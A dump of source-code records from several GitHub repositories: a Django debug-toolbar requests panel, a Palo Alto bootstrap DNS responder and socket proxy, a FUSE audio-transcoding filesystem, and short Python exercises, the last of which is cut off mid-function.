ensure\n # that the headers sent only use headers that won't make\n # the meaning of the request semantically different, or\n # headers that we can support using forms (e.g. 'enctype'\n # can emulate some values of the'Content-Type' header.)\n has_browser_compatible_headers = check_browser_compatible_headers(request),\n\n # Can't repeat GET requests with anything in the body. The\n # browser will just tack it on to the URL instead of using\n # a GET body. (Not that GET bodies have semantic meaning in\n # HTTP, but people still do strange things.)\n is_not_get_with_body = any((\n (request.method == 'POST'),\n ((not request.data) and (not request.files)),\n )),\n\n # In POST requests, you can send multipart and non-multipart\n # data separately. 
Once browser forms have an encoding of\n # `multipart/form-data`, however, every parameter will be\n # sent as multipart data.\n is_not_data_and_files = not (request.data and request.files),\n\n # For POST bodies, the browser only do key-value bodies and\n # not other payloads, such as strings.\n is_key_value_body = isinstance(request.data, dict),\n )\n\n response_timer.request.is_browser_repeatable = all(\n response_timer.request.browser_repeatability_conditions.values()\n )\n\n self.record_stats({\n 'response_timers': response_timers,\n })\n\n" }, { "alpha_fraction": 0.6115485429763794, "alphanum_fraction": 0.6115485429763794, "avg_line_length": 23.580644607543945, "blob_id": "6a7cfb668f908c96c9451e2b9eb6a25d7555458c", "content_id": "baf4d52396f4afaab803c490ccb6db0ba30ad2e7", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 762, "license_type": "permissive", "max_line_length": 112, "num_lines": 31, "path": "/README.rst", "repo_name": "enginoid/django-debug-toolbar-requests", "src_encoding": "UTF-8", "text": "===================================\nDjango Debug Toolbar Requests Panel\n===================================\n\nThe Django Debug Toolbar Requests Panel (no less) is a plugin that provides\ndebug information about HTTP requests done with Kenneth Reitz' HTTP library,\n`requests`.\n\nInstallation\n============\n\nAdd the following lines to your ``settings.py``::\n\n INSTALLED_APPS = (\n ...\n 'debug_toolbar_requests',\n ...\n )\n\n DEBUG_TOOLBAR_PANELS = (\n ...\n 'debug_toolbar_requests.panel.RequestsDebugPanel',\n ...\n )\n\nAn extra panel titled \"HTTP Requests\" should appear in your debug toolbar.\n\nScreenshot\n==========\n\n.. image:: https://raw.github.com/enginous/django-debug-toolbar-requests/master/docs/images/screenshots/main.png\n" } ]
6
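The README of the record above covers installation but not what actually populates the panel. Since the panel monkey-patches requests.models.Request, any call made through the requests library during Django's request/response cycle is timed and listed. A minimal sketch of such a view (the URL, view name and API endpoint are hypothetical):

# views.py -- hypothetical Django view
import requests
from django.http import HttpResponse

def weather(request):
    # This outbound call is captured by the patched Request class and shows
    # up in the "HTTP Requests" panel with its duration, headers, a body
    # preview and, where the conditions allow, an in-browser replay button.
    api_response = requests.get("http://api.example.com/weather",
                                params={"city": "Reykjavik"})
    return HttpResponse(api_response.text)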
tdmakepeace/PaloSocketProxyandDNS
https://github.com/tdmakepeace/PaloSocketProxyandDNS
81464150cc1ca1fd8825b4f36028f3298b4fde2f
a8441432a1b40b4e16b256e49c91d3d09393c557
a272e25c5024a23297f63aa2f5a362636cb94421
refs/heads/master
2020-06-20T03:20:40.712417
2019-07-15T10:01:09
2019-07-15T10:01:09
196,973,236
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7914055585861206, "alphanum_fraction": 0.7914055585861206, "avg_line_length": 55.849998474121094, "blob_id": "cbf3102e86c08c319fba9370cf72165726c05d54", "content_id": "e0833ec8a99a8c89e3e66c0090154a49930ece99", "detected_licenses": [ "MIT", "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1117, "license_type": "permissive", "max_line_length": 176, "num_lines": 20, "path": "/README.md", "repo_name": "tdmakepeace/PaloSocketProxyandDNS", "src_encoding": "UTF-8", "text": "# PaloSocketProxyandDNS\nPalo Alto Networks - Tool for helping to support the bootstrap process of a VM-Series without direct internet access from the \nmanagement interface.\n<br><br>\nThe tool acts as a DNS server on the management network, and returns the addresses configured for the main sites the Palo Alto Networks \nNGFW needs during the bootstrapping process.<br>\nThe tool also creates socket proxies on those addresses through to the real destinations.<br>\nThe idea behind it is to act as a proxy server, giving the NGFW access to the Palo Alto Networks sites over the internet from a walled-garden network.\n<br>\n\t\n\n# To set up\nOn a host, configure secondary IP addresses on the interface to be used as the socket proxy. <br> <br>\nConfigure the NGFW to use the default address as the default gateway and the DNS server.<br>\n\n<br>\nAs long as the host running the script has access to the internet via a true proxy or secondary interface, the only sites the NGFW will have access to are those defined in the script.\n\n# Disclaimer\nThis software is provided without support, warranty, or guarantee. Use at your own risk.\n" }, { "alpha_fraction": 0.5528854727745056, "alphanum_fraction": 0.5779500603675842, "avg_line_length": 36.576053619384766, "blob_id": "65cebb879a5073266f381c934e486ac76e2f9b43", "content_id": "1b7c9b2690c03b01fcb47f5f92c8f9e98ef036ac", "detected_licenses": [ "MIT", "LicenseRef-scancode-warranty-disclaimer" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11610, "license_type": "permissive", "max_line_length": 127, "num_lines": 309, "path": "/bootstrapforward.py", "repo_name": "tdmakepeace/PaloSocketProxyandDNS", "src_encoding": "UTF-8", "text": "###############################\r\n# The code is not pretty, and is stolen from a number of other sources and modified. \r\n# relies on the machine running the code having multiple IP addresses to run the port forward on 443.\r\n# the server runs as a DNS server for the main URLs needed to do bootstrapping.\r\n# any other DNS query resolves to the host's default IP address; you can redirect this to anywhere as required.\r\n###############################\r\n\r\nimport socket\r\nimport threading\r\nimport sys\r\nimport time\r\nimport socketserver\r\n\r\n\r\n\r\nDNS_HEADER_LENGTH = 12\r\n# TODO make some DNS database with IPs connected to regexs\r\n\r\nDNShost = '192.168.1.209'\r\nDNSport = 53\r\n \r\ndefault = '192.168.1.209'\r\nupdates = '192.168.1.210'\r\ndownloads ='192.168.1.211'\r\nurlcloud = '192.168.1.212'\r\ndnsservice = '192.168.1.213'\r\n\r\n###### other entries you might need if you want to run everything via the socket proxy.\r\n# serverlist.urlcloud.paloaltonetworks.com\r\n# pandb2dc10prod.urlcloud.paloaltonetworks.com\r\n# pandb2dlprod.urlcloud.paloaltonetworks.com\r\n#\r\n# assume you can add more by adding more IP addresses to the host. see the 
see the \n######\n\n################DNS part##############\n\nclass DNSHandler(socketserver.BaseRequestHandler):\n def handle(self):\n socket = self.request[1]\n data = self.request[0].strip()\n\n # If request doesn't even contain full header, don't respond.\n if len(data) < DNS_HEADER_LENGTH:\n return\n\n # Try to read questions - if they're invalid, don't respond.\n try:\n all_questions = self.dns_extract_questions(data)\n except IndexError:\n return\n\n # Filter only those questions, which have QTYPE=A and QCLASS=IN\n # TODO this is very limiting, remove QTYPE filter in future, handle different QTYPEs\n accepted_questions = []\n for question in all_questions:\n name = str(b'.'.join(question['name']), encoding='UTF-8')\n# print(name)\n if question['qtype'] == b'\\x00\\x01' and question['qclass'] == b'\\x00\\x01':\n accepted_questions.append(question)\n print('\\033[32m{}\\033[39m'.format(name))\n else:\n print('\\033[31m{}\\033[39m'.format(name))\n\n\n response = (\n self.dns_response_header(data) +\n self.dns_response_questions(accepted_questions) +\n self.dns_response_answers(accepted_questions)\n )\n socket.sendto(response, self.client_address)\n\n def dns_extract_questions(self, data):\n \"\"\"\n Extracts question section from DNS request data.\n See http://tools.ietf.org/html/rfc1035 4.1.2. Question section format.\n \"\"\"\n questions = []\n # Get number of questions from header's QDCOUNT\n n = (data[4] << 8) + data[5]\n # Where we actually read in data? Start at beginning of question sections.\n pointer = DNS_HEADER_LENGTH\n # Read each question section\n for i in range(n):\n question = {\n 'name': [],\n 'qtype': '',\n 'qclass': '',\n }\n length = data[pointer]\n # Read each label from QNAME part\n while length != 0:\n start = pointer + 1\n end = pointer + length + 1\n question['name'].append(data[start:end])\n pointer += length + 1\n length = data[pointer]\n # Read QTYPE\n question['qtype'] = data[pointer+1:pointer+3]\n # Read QCLASS\n question['qclass'] = data[pointer+3:pointer+5]\n # Move pointer 5 octets further (zero length octet, QTYPE, QNAME)\n pointer += 5\n questions.append(question)\n return questions\n\n def dns_response_header(self, data):\n \"\"\"\n Generates DNS response header.\n See http://tools.ietf.org/html/rfc1035 4.1.1. Header section format.\n \"\"\"\n header = b''\n # ID - copy it from request\n header += data[:2]\n # QR 1 response\n # OPCODE 0000 standard query\n # AA 0 not authoritative\n # TC 0 not truncated\n # RD 0 recursion not desired\n # RA 0 recursion not available\n # Z 000 unused\n # RCODE 0000 no error condition\n header += b'\\x80\\x00'\n # QDCOUNT - question entries count, set to QDCOUNT from request\n header += data[4:6]\n # ANCOUNT - answer records count, set to QDCOUNT from request\n header += data[4:6]\n # NSCOUNT - authority records count, set to 0\n header += b'\\x00\\x00'\n # ARCOUNT - additional records count, set to 0\n header += b'\\x00\\x00'\n return header\n\n def dns_response_questions(self, questions):\n \"\"\"\n Generates DNS response questions.\n See http://tools.ietf.org/html/rfc1035 4.1.2. 
Question section format.\r\n        \"\"\"\r\n        sections = b''\r\n        for question in questions:\r\n            section = b''\r\n            for label in question['name']:\r\n                # Length octet\r\n                section += bytes([len(label)])\r\n                section += label\r\n            # Zero length octet\r\n            section += b'\\x00'\r\n            section += question['qtype']\r\n            section += question['qclass']\r\n            sections += section\r\n        return sections\r\n\r\n    def dns_response_answers(self, questions):\r\n        \"\"\"\r\n        Generates DNS response answers.\r\n        See http://tools.ietf.org/html/rfc1035 4.1.3. Resource record format.\r\n        \"\"\"\r\n        records = b''\r\n        for question in questions:\r\n            name = str(b'.'.join(question['name']), encoding='UTF-8')\r\n#            print(name)\r\n            if name == \"updates.paloaltonetworks.com\":\r\n                IP = updates\r\n            elif name == \"downloads.paloaltonetworks.com\":\r\n                IP = downloads\r\n            elif name == \"s0000.urlcloud.paloaltonetworks.com\":\r\n                IP = urlcloud\r\n            elif name == \"dns.service.paloaltonetworks.com\":\r\n                IP = dnsservice\r\n            else:\r\n                IP = default\r\n#            print (IP)\r\n            \r\n            record = b''\r\n            for label in question['name']:\r\n                # Length octet\r\n                record += bytes([len(label)])\r\n                record += label\r\n            # Zero length octet\r\n            record += b'\\x00'\r\n            # TYPE - just copy QTYPE\r\n            # TODO QTYPE values set is superset of TYPE values set, handle different QTYPEs, see RFC 1035 3.2.3.\r\n            record += question['qtype']\r\n            # CLASS - just copy QCLASS\r\n            # TODO QCLASS values set is superset of CLASS values set, handle at least * QCLASS, see RFC 1035 3.2.5.\r\n            record += question['qclass']\r\n            # TTL - 32 bit unsigned integer. Set to 0 to inform, that response\r\n            # should not be cached.\r\n            record += b'\\x00\\x00\\x00\\x00'\r\n            # RDLENGTH - 16 bit unsigned integer, length of RDATA field.\r\n            # In case of QTYPE=A and QCLASS=IN, RDLENGTH=4.\r\n            record += b'\\x00\\x04'\r\n            # RDATA - in case of QTYPE=A and QCLASS=IN, it's IPv4 address.\r\n            record += b''.join(map(\r\n                lambda x: bytes([int(x)]),\r\n                IP.split('.')\r\n            ))\r\n            records += record\r\n        return records\r\n\r\n################ DNS Part END ##############\r\n\r\n################ Socket forwarder ##############\r\n\r\n\r\ndef handledns(buffer):\r\n    return buffer\r\n    \r\n\r\ndef transfer(src, dst, direction):\r\n    src_name = src.getsockname()\r\n    src_address = src_name[0]\r\n    src_port = src_name[1]\r\n    dst_name = dst.getsockname()\r\n    dst_address = dst_name[0]\r\n    dst_port = dst_name[1]\r\n    while True:\r\n        buffer = src.recv(0x400)\r\n        if len(buffer) == 0:\r\n            print (\"[-] No data received! Breaking...\")\r\n            break\r\n        # print \"[+] %s:%d => %s:%d [%s]\" % (src_address, src_port, dst_address, dst_port, repr(buffer))\r\n        if direction:\r\n            print (\"[+] %s:%d >>> %s:%d [%d]\" % (src_address, src_port, dst_address, dst_port, len(buffer)))\r\n        else:\r\n            print (\"[+] %s:%d <<< %s:%d [%d]\" % (dst_address, dst_port, src_address, src_port, len(buffer)))\r\n        dst.send(handledns(buffer))\r\n    print (\"[+] Closing connections! [%s:%d]\" % (src_address, src_port))\r\n    src.shutdown(socket.SHUT_RDWR)\r\n    src.close()\r\n    print (\"[+] Closing connections! [%s:%d]\" % (dst_address, dst_port))\r\n    dst.shutdown(socket.SHUT_RDWR)\r\n    dst.close()\r\n\r\n\r\ndef server(local_host, local_port, remote_host, remote_port, max_connection,host):\r\n    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n    server_socket.bind((local_host, local_port))\r\n    server_socket.listen(max_connection)\r\n    print (\"[+] Server started [%s:%d] for [%s]\" % (local_host, local_port, host))\r\n    print (\"[+] Connect to [%s:%d] to get the content of [%s:%d]\" % (local_host, local_port, remote_host, remote_port))\r\n    while True:\r\n        local_socket, local_address = server_socket.accept()\r\n        print (\"[+] Detected connection from [%s:%s]\" % (local_address[0], local_address[1]))\r\n        print (\"[+] Trying to connect to the REMOTE server [%s:%d]\" % (remote_host, remote_port))\r\n        remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n        remote_socket.connect((remote_host, remote_port))\r\n        print (\"[+] Tunnel connected! Transferring data...\")\r\n        # threads = []\r\n        s = threading.Thread(target=transfer, args=(\r\n            remote_socket, local_socket, False))\r\n        r = threading.Thread(target=transfer, args=(\r\n            local_socket, remote_socket, True))\r\n        # threads.append(s)\r\n        # threads.append(r)\r\n        s.start()\r\n        r.start()\r\n    print (\"[+] Releasing resources...\")\r\n    remote_socket.shutdown(socket.SHUT_RDWR)\r\n    remote_socket.close()\r\n    local_socket.shutdown(socket.SHUT_RDWR)\r\n    local_socket.close()\r\n    print (\"[+] Closing server...\")\r\n    server_socket.shutdown(socket.SHUT_RDWR)\r\n    server_socket.close()\r\n    print (\"[+] Server shut down!\")\r\n    \r\n    \r\n    \r\n################ Socket forwarder END ##############\r\n    \r\ndef main():\r\n    MAX_CONNECTION = 0x10\r\n    LOCAL_HOST1 = updates\r\n    LOCAL_HOST2 = downloads\r\n    LOCAL_HOST3 = urlcloud\r\n    LOCAL_HOST4 = dnsservice\r\n\r\n    HOST1 = 'updates.paloaltonetworks.com'\r\n    HOST2 = 'downloads.paloaltonetworks.com'\r\n    HOST3 = 's0000.urlcloud.paloaltonetworks.com'\r\n    HOST4 = 'dns.service.paloaltonetworks.com'\r\n\r\n    REMOTE_HOST1 = socket.gethostbyname(HOST1)\r\n    REMOTE_HOST2 = socket.gethostbyname(HOST2)\r\n    REMOTE_HOST3 = socket.gethostbyname(HOST3)\r\n    REMOTE_HOST4 = socket.gethostbyname(HOST4)\r\n    LOCAL_PORT = 443\r\n    REMOTE_PORT = 443\r\n\r\n    thread1 = threading.Thread(target=server, args=(LOCAL_HOST1, LOCAL_PORT, REMOTE_HOST1, REMOTE_PORT, MAX_CONNECTION, HOST1))\r\n    thread2 = threading.Thread(target=server, args=(LOCAL_HOST2, LOCAL_PORT, REMOTE_HOST2, REMOTE_PORT, MAX_CONNECTION, HOST2))\r\n    thread3 = threading.Thread(target=server, args=(LOCAL_HOST3, LOCAL_PORT, REMOTE_HOST3, REMOTE_PORT, MAX_CONNECTION, HOST3))\r\n    thread4 = threading.Thread(target=server, args=(LOCAL_HOST4, LOCAL_PORT, REMOTE_HOST4, REMOTE_PORT, MAX_CONNECTION, HOST4))\r\n    \r\n    thread1.start()\r\n    thread2.start()\r\n    thread3.start()\r\n    thread4.start()\r\n    \r\n    dnsserver = socketserver.ThreadingUDPServer((DNShost, DNSport), DNSHandler)\r\n    print('\\033[36mStarted DNS server.\\033[39m')\r\n    threadx = threading.Thread(target=dnsserver.serve_forever, args=())\r\n    threadx.start() \r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()" } ]
2
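Because the DNSHandler above only answers questions with QTYPE=A and QCLASS=IN, the DNS half of the script can be smoke-tested with a hand-rolled UDP query. A minimal sketch, assuming the script's default settings (DNShost 192.168.1.209 on port 53, and the hostname-to-address table shown above):

import socket
import struct

def build_query(hostname, txn_id=0x1234):
    # Header: ID, flags (recursion desired), QDCOUNT=1, ANCOUNT=NSCOUNT=ARCOUNT=0
    header = struct.pack('>HHHHHH', txn_id, 0x0100, 1, 0, 0, 0)
    # QNAME: length-prefixed labels terminated by a zero octet
    qname = b''.join(bytes([len(p)]) + p.encode() for p in hostname.split('.')) + b'\x00'
    # QTYPE=A (1), QCLASS=IN (1) -- the only combination the handler accepts
    return header + qname + struct.pack('>HH', 1, 1)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
sock.sendto(build_query('updates.paloaltonetworks.com'), ('192.168.1.209', 53))
response, _ = sock.recvfrom(512)
# With a single question the server appends exactly one A record, so the
# IPv4 address (RDATA) is the last four octets of the response.
print('.'.join(str(b) for b in response[-4:]))   # expected: 192.168.1.210

Any name that is not in the if/elif table should come back as the default address, 192.168.1.209.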
LeonB/gstreamerfs
https://github.com/LeonB/gstreamerfs
687f3378f6146fc330cbbdf6ee076548470dcad6
2310ea31f57d10730f76ba4b5ffa6d5d45d5b12f
5935eb866fce5a390fe6ce3861e4918264688ce0
refs/heads/master
2016-09-10T18:35:24.983772
2010-08-03T08:54:31
2010-08-03T08:54:31
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8064516186714172, "alphanum_fraction": 0.8064516186714172, "avg_line_length": 18.600000381469727, "blob_id": "aeddad268cb849df7db8f2730c3839f06a43606b", "content_id": "6ec1aa2e977c68b6355f8fc9bb8f9ed1153d3a00", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 93, "license_type": "no_license", "max_line_length": 24, "num_lines": 5, "path": "/nbproject/project.properties", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "java.lib.path=\nmain.file=gstreamerfs.py\nplatform.active=default\npython.lib.path=\nsrc.dir=src\n" }, { "alpha_fraction": 0.7428571581840515, "alphanum_fraction": 0.7428571581840515, "avg_line_length": 17, "blob_id": "c1770c065badaa2f614f0ef19d5608962075d78f", "content_id": "52df70d5a844023a08e1cd6310f7d529f854fd26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 18, "num_lines": 2, "path": "/src/GstreamerFS/__init__.py", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "from FS import *\nfrom File import *" }, { "alpha_fraction": 0.5433155298233032, "alphanum_fraction": 0.5460656881332397, "avg_line_length": 32.06060791015625, "blob_id": "e8bdc53d516e6b1f716d1370b5691db46e32b5ee", "content_id": "0bfd43248b131e02a0da7fdaac4f72717afd3bc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6545, "license_type": "no_license", "max_line_length": 85, "num_lines": 198, "path": "/src/GstreamerFS/FS.py", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "import os.path\nimport os\nfrom errno import *\nfrom stat import *\n\nimport fuse\nfrom fuse import Fuse\nimport syslog\nimport GstreamerFS\n\nclass FS(Fuse):\n\n    def __init__(self, *args, **kw):\n\n        Fuse.__init__(self, *args, **kw)\n\n        # do stuff to set up your filesystem here, if you want\n        #import thread\n        #thread.start_new_thread(self.mythread, ())\n        self.root = '/'\n#        self.file_class = GstreamerFSFile\n        self.files = {}\n\n    def main(self, *args, **kwargs):\n        fuse = self\n\n        class FileClass(GstreamerFS.File):\n            def __init__(self, *args, **kwargs):\n                syslog.syslog('fuse: %s' % fuse)\n                syslog.syslog('self: %s' % self)\n                GstreamerFS.File.__init__(self, fuse, *args, **kwargs)\n\n        self.file_class = FileClass\n        return Fuse.main(self, *args, **kwargs)\n\n#    def mythread(self):\n#\n#        \"\"\"\n#        The beauty of the FUSE python implementation is that with the python interp\n#        running in foreground, you can have threads\n#        \"\"\"\n#        print \"mythread: started\"\n#        while 1:\n#            time.sleep(120)\n#            print \"mythread: ticking\"\n\n    def getattr(self, path):\n        syslog.syslog('Function getattr(%s) called' % (path))\n\n#        syslog.syslog('Path: %s' % path)\n#        syslog.syslog('self.files: %s' % self.files)\n\n        if (self.files.has_key(path)):\n#            syslog.syslog('self.files[%s] = %s' % (path, self.files[path]))\n            path = self.files[path]\n\n        return os.lstat(\".\" + path)\n\n    def readlink(self, path):\n        syslog.syslog('Function readlink(%s) called' % (path))\n        return os.readlink(\".\" + path)\n\n    def readdir(self, path, offset):\n        syslog.syslog('Function readdir(%s, %s) called' % (path, offset))\n\n        if os.path.isdir(\".\" + path):\n            yield fuse.Direntry('.')\n            yield fuse.Direntry('..')\n\n        #in order of trying: the further back in the list, the less preferred\n        extensions = ['.wav', '.flac', '.ogg', '.wma']\n        for e in os.listdir(\".\" + path):\n            f = self.root + path + os.sep + e\n            
syslog.syslog('file: ' + f)\n\n if os.path.isfile(f):\n basename, extension = os.path.splitext(e)\n #Take into account that some files could be double:\n # e.g.: test.flac, test.ogg\n if extension.lower() in extensions:\n\n syslog.syslog('Returning: ' + basename + '.mp3')\n self.files[path + os.sep + basename + '.mp3'] = path + os.sep + e\n yield fuse.Direntry(basename + '.mp3')\n syslog.syslog('Transcode file: ' + f)\n continue\n else:\n yield fuse.Direntry(e)\n continue\n else:\n yield fuse.Direntry(e)\n continue\n\n def unlink(self, path):\n os.unlink(\".\" + path)\n\n def rmdir(self, path):\n os.rmdir(\".\" + path)\n\n def symlink(self, path, path1):\n os.symlink(path, \".\" + path1)\n\n def rename(self, path, path1):\n os.rename(\".\" + path, \".\" + path1)\n\n def link(self, path, path1):\n os.link(\".\" + path, \".\" + path1)\n\n def chmod(self, path, mode):\n os.chmod(\".\" + path, mode)\n\n def chown(self, path, user, group):\n os.chown(\".\" + path, user, group)\n\n def truncate(self, path, len):\n syslog.syslog('Function truncate(%s, %s) called' % (path, len))\n f = open(\".\" + path, \"a\")\n f.truncate(len)\n f.close()\n\n def mknod(self, path, mode, dev):\n os.mknod(\".\" + path, mode, dev)\n\n def mkdir(self, path, mode):\n syslog.syslog('Function mkdir(%s, %s) called' % (path, mode))\n os.mkdir(\".\" + path, mode)\n\n def utime(self, path, times):\n syslog.syslog('Function utime(%s, %s) called' % (path, times))\n os.utime(\".\" + path, times)\n\n# The following utimens method would do the same as the above utime method.\n# We can't make it better though as the Python stdlib doesn't know of\n# subsecond preciseness in acces/modify times.\n#\n# def utimens(self, path, ts_acc, ts_mod):\n# os.utime(\".\" + path, (ts_acc.tv_sec, ts_mod.tv_sec))\n\n def access(self, path, mode):\n syslog.syslog('Function access(%s, %s) called' % (path, mode))\n\n syslog.syslog('Function getattr(%s) called' % (path))\n\n# syslog.syslog('Path: %s' % path)\n# syslog.syslog('self.files: %s' % self.files)\n\n if (self.files.has_key(path)):\n# syslog.syslog('self.files[%s] = %s' % (path, self.files[path]))\n path = self.files[path]\n\n if not os.access(\".\" + path, mode):\n return -EACCES\n\n# This is how we could add stub extended attribute handlers...\n# (We can't have ones which aptly delegate requests to the underlying fs\n# because Python lacks a standard xattr interface.)\n#\n# def getxattr(self, path, name, size):\n# val = name.swapcase() + '@' + path\n# if size == 0:\n# # We are asked for size of the value.\n# return len(val)\n# return val\n#\n# def listxattr(self, path, size):\n# # We use the \"user\" namespace to please XFS utils\n# aa = [\"user.\" + a for a in (\"foo\", \"bar\")]\n# if size == 0:\n# # We are asked for size of the attr list, ie. 
joint size of attrs\n# # plus null separators.\n# return len(\"\".join(aa)) + len(aa)\n# return aa\n\n def statfs(self):\n \"\"\"\n Should return an object with statvfs attributes (f_bsize, f_frsize...).\n Eg., the return value of os.statvfs() is such a thing (since py 2.2).\n If you are not reusing an existing statvfs object, start with\n fuse.StatVFS(), and define the attributes.\n\n To provide usable information (ie., you want sensible df(1)\n output, you are suggested to specify the following attributes:\n\n - f_bsize - preferred size of file blocks, in bytes\n - f_frsize - fundamental size of file blcoks, in bytes\n [if you have no idea, use the same as blocksize]\n - f_blocks - total number of blocks in the filesystem\n - f_bfree - number of free blocks\n - f_files - total number of file inodes\n - f_ffree - nunber of free file inodes\n \"\"\"\n\n syslog.syslog('Function statfs() called')\n return os.statvfs(\".\")\n\n def fsinit(self):\n print \"fsinit()...\"\n os.chdir(self.root)" }, { "alpha_fraction": 0.6168371438980103, "alphanum_fraction": 0.6262785196304321, "avg_line_length": 22.55555534362793, "blob_id": "8553e37c0445f962db56392e38d518c3c6503a34", "content_id": "018d81ee2869d378d13873430ed1a606866daa54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1271, "license_type": "no_license", "max_line_length": 90, "num_lines": 54, "path": "/src/gstreamerfs.py", "repo_name": "LeonB/gstreamerfs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# Copyright (C) 2001 Jeff Epler <[email protected]>\n# Copyright (C) 2006 Csaba Henk <[email protected]>\n#\n# This program can be distributed under the terms of the GNU LGPL.\n# See the file COPYING.\n#\n\nimport os\nimport sys\n\nimport fuse\nfrom fuse import Fuse\nimport GstreamerFS\n\nimport syslog\nsyslog.openlog('gstreamerFS')\n\nif not hasattr(fuse, '__version__'):\n raise RuntimeError, \\\n \"your fuse-py doesn't know of fuse.__version__, probably it's too old.\"\n\nfuse.fuse_python_api = (0, 2)\n\n# We use a custom file class\nfuse.feature_assert('stateful_files', 'has_init')\n\ndef main():\n\n usage = \"\"\"\nUserspace nullfs-alike: mirror the filesystem tree from some point on.\n\n\"\"\" + Fuse.fusage\n\n server = GstreamerFS.FS(version=\"%prog \" + fuse.__version__,\n usage=usage)\n\n server.parser.add_option(mountopt=\"root\", metavar=\"PATH\", default='/',\n help=\"mirror filesystem from under PATH [default: %default]\")\n server.parse(values=server, errex=1)\n\n try:\n if server.fuse_args.mount_expected():\n os.chdir(server.root)\n except OSError:\n print >> sys.stderr, \"can't enter root of underlying filesystem\"\n sys.exit(1)\n\n server.main()\n\n\nif __name__ == '__main__':\n main()" } ]
4
Zhoulonghai/zlh1
https://github.com/Zhoulonghai/zlh1
550fa80f2d6e49babb9f649cf82e34d3dd6266f6
eab681ae12fe4b07dbab03f2aa3b034583ec283e
cc0ad1141b55c75d677230ce9176e4d609dfdcb1
refs/heads/master
2022-06-13T22:10:00.459428
2020-05-07T12:52:47
2020-05-07T12:52:47
262,047,245
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.48688048124313354, "alphanum_fraction": 0.5364431738853455, "avg_line_length": 23.571428298950195, "blob_id": "73637cf8ef5d1dafd3fe0d12b9f2f97d76ae4a98", "content_id": "113318cf435821ca392390ec7b3cfdc7094a807f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 114, "num_lines": 14, "path": "/Python_tutorial1/Python0007.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0007】Yang Hui's triangle (Pascal's triangle)\n\ndef YangHui (num):\n    LL = [[1]]\n    for i in range(1,num):\n        LL.append([(0 if j == 0 else LL[i-1][j-1])+ (0 if j == len(LL[i-1]) else LL[i-1][j]) for j in range(i+1)])\n    return LL\na = int(input())\nfor i in YangHui(a+1):\n    for j in i:\n        print(\"%5d\"%j,end=\"\")\n    print()" }, { "alpha_fraction": 0.4032258093357086, "alphanum_fraction": 0.47235023975372314, "avg_line_length": 24.58823585510254, "blob_id": "eefefaa7d0c93a01200d304ea5b18b227c4376ef", "content_id": "8b91148401ad7b255c340c43f1e9f3ed165a62db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 468, "license_type": "no_license", "max_line_length": 60, "num_lines": 17, "path": "/Python_tutorial1/Python0011.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0011】Newton's iteration method\nfrom math import fabs\n\ndef solut(a,b,c,d,e):\n    x1=e\n    # iterate:\n    while True:\n        x=x1\n        f = ((a * x + b) * x + c) * x + d   #the original function\n        f1 = (3 * a * x + 2 * b) * x + c   #its derivative\n        x1 = x - f / f1\n        if (fabs(x1 - x) <= 0.00000001):\n            return x1\nnum = [float(n) for n in input('').split()]\nprint((\"%0.2f\")%(solut(num[0],num[1],num[2],num[3],num[4])))" }, { "alpha_fraction": 0.4480000138282776, "alphanum_fraction": 0.492000013589859, "avg_line_length": 13.94444465637207, "blob_id": "84993d25bca7059c07a6d4faefdee508116f9634", "content_id": "2c1574b355ec68385b09f9f0f5423f5f68adaf11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 272, "license_type": "no_license", "max_line_length": 22, "num_lines": 18, "path": "/Python_tutorial1/Python0010.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0010】factor expansion of a positive integer\n\na=int(input())\nb=str(a)\nnum=[]\ni=1\nwhile i <= a:\n    if a%i == 0:\n        a = a/i\n        num.append(i)\n        i = 1\n    i+=1\nb+='='+str(num[1])\nfor j in num[2:]:\n    b+=\"*\"+str(j)\nprint(b)" }, { "alpha_fraction": 0.4976958632469177, "alphanum_fraction": 0.5130568146705627, "avg_line_length": 29.636363983154297, "blob_id": "2eed3cd6967499efbf2afdcb45d1292437231116", "content_id": "74bc121fe9dc0fac7878910bfa88038b14c0fc77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 831, "license_type": "no_license", "max_line_length": 69, "num_lines": 22, "path": "/Python_tutorial1/Python0005.py", "repo_name": "Zhoulonghai/zlh1", "src_encoding": "UTF-8", "text": "#coding=utf-8\n#author = zhoulonghai\n#【Python0005】simulate the LRU page-replacement algorithm\ndef LRU(pages, maxNum, n):\n    temp = []\n    times = 0\n    for page in pages:\n        num = len(temp)\n        if num < n:  # there is a free main-memory block\n            temp.append(page)\n        elif num == n:  # no free main-memory block\n            if page in temp:  # the requested page is already in a memory block; move the most recently accessed 